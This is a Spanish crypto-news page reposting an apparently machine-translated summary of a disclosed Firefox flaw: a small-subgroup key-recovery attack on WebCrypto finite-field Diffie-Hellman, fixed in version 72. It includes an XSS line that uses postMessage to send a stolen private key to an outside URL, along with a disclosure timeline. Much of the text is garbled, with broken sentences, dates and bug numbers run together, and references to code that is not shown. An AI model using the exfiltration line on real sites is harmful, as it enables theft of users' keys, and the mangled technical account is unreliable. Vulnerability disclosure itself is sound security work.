El curioso caso de WebCrypto Diffie-Hellman en Firefox – Ataque de recuperación de clave de subgrupos pequeños en DH . Prensa

El curioso caso de WebCrypto Diffie-Hellman en Firefox – Ataque de recuperación de clave de subgrupos pequeños en DH . Prensa
Cripto noticia ultima hora. 07/01/20. tl; dr Mozilla Firefox antes de la versión 72 sufre un ataque de recuperación de clave de subgrupos pequeños en DH en la API de WebCrypto. El te de Firefox ...07/01/20: El curioso caso de WebCrypto Diffie-Hellman en Firefox - Ataque de recuperación de clave […]
FACEBOOK TWITTER WHATSAPP

Cripto noticia ultima hora. 07/01/20. tl; dr Mozilla Firefox antes de la versión 72 sufre un ataque de recuperación de clave de subgrupos pequeños en DH en la API de WebCrypto. El te de Firefox …

Cripto noticia ultima hora 07/01/20

07/01/20: El curioso caso de WebCrypto Diffie-Hellman en Firefox – Ataque de recuperación de clave de subgrupos pequeños en DH

Tl; dr Mozilla Firefox antes de la versión 72 sufre un ataque de recuperación de clave de subgrupos pequeños en DH en la API de WebCrypto. El equipo de Firefox solucionó el problema eliminando completamente el soporte para DH en campos finitos.

Dijo que esta publicación no se trata de la utilidad de WebCrypto, así que le ahorraré mi opinión sobre el tema: p. Ok, podría decir, ahora tenemos tres párrafos sobre WebCrypto, pero ¿cómo se ve esto? Afortunadamente, el buen diafygi viene al rescate con una página completa de ejemplos ¿Realmente simple no? De una manera similar de encriptación usando AES-GCM, la API de WebCrypto le proporciona formas simples de usar HMAC, RSA, ECDSA, ECDH y demás … Hermoso.

Hay muchos lugares en la web donde se discute la seguridad de WebCrypto en profundidad.

Entonces, ¡incluso si un atacante podrá obtener el privilegio XSS, no podrá robar la clave!

WebCrypto DH Así que llegamos para hablar sobre WebCrypto DH. Vayamos directamente al grano.

Diffie-Hellman sobre campos finitos no está en la especificación de WebCrypto y solo lo implementa Mozilla Firefox.

Este fue el argumento de un pequeño debate durante el desarrollo de la especificación, pero al final Ryan Sleevi señaló el punto Por alguna razón, Mozilla Firefox decidió mantener la implementación de WebCrypto DH. Ahora, un posible uso típico del escenario WebCrypto DH es el siguiente: Alice genera un par de claves DH y se lo envía a Bob.

El siguiente fragmento muestra cómo el atacante podrá recuperar la clave privada utilizando el Ataque de recuperación de clave de pequeños subgrupos.
Como un punto extra, aunque agregué un pequeño fragmento sobre cómo un atacante podría filtrar la clave usando postMessage: // XSS comienza aquí.

PostMessage (kpE.privateKey, “Https://asanso.github.io/firefox /receiver.html “); 27-06-2018 – Informó el problema a través de bugzilla: Error 147168428-06-2018 – El equipo de seguridad de Firefox confirmó la vulnerabilidad28-03-2019 – Error 1539578: Se agregó la telemetría para el uso de DH en WebCrypto API.

Recuerda compartir la pagina sobre Criptonoticias en español en tus redes sociales..

Cripto noticia ultima hora. Noticias. 07/01/20.

CriptomonedasRentables.com en Español desarrollo de contenidos para el ecosistema blockchain hispano creado por MarketingPont.com, Agencia de Marketing Online para Proyectos Cripto
CriptomonedasRentables.com en Español
desarrollo de contenidos para el ecosistema blockchain hispano creado por MarketingPont.com, Agencia de Marketing Online para Proyectos Cripto
Criptomonedas Rentables
Si deseas hablar con un especialista sobre tu idea o proyecto cripto, contáctanos ahora mismo. CLIC AQUI

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *